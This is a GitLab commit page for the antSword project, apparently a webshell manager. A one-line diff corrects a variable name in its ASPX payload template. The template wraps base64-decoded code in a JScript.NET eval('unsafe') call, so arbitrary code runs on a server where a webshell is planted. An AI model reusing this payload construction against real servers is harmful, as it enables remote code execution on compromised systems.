Skip to content
Projects
Groups
Snippets
Help
Loading...
Help
Submit feedback
Contribute to GitLab
Sign in / Register
Toggle navigation
A
antSword
Project
Project
Details
Activity
Releases
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
HuangJunbo
antSword
Commits
4c7acd8e
Commit
4c7acd8e
authored
Apr 21, 2016
by
antoor
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
An emergency repair variable name error causes the ASPX script to not be used!
紧急修复变量名错误导致ASPX脚本无法使用
parent
3af9f1e9
Changes
1
Hide whitespace changes
Inline
Side-by-side
Showing
1 changed file
with
1 addition
and
1 deletion
+1
-1
index.jsx
source/core/aspx/index.jsx
+1
-1
No files found.
source/core/aspx/index.jsx
View file @
4c7acd8e
...
...
@@ -50,7 +50,7 @@ class ASPX extends Base {
// base64编码一次数据
let
base64Code
=
formatter
[
'base64'
](
data
[
'_'
]);
data
[
'_'
]
=
`Response.Write("
${
tag_s
}
");var err:Exception;try{eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String("
${
ba
ba
se64Code
}
")),"unsafe");}catch(err){Response.Write("ERROR:// "+err.message);}Response.Write("
${
tag_e
}
");Response.End();`
;
data
[
'_'
]
=
`Response.Write("
${
tag_s
}
");var err:Exception;try{eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String("
${
base64Code
}
")),"unsafe");}catch(err){Response.Write("ERROR:// "+err.message);}Response.Write("
${
tag_e
}
");Response.End();`
;
// 使用编码器进行处理并返回
return
this
.
encodeComplete
(
tag_s
,
tag_e
,
data
);
...
...
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment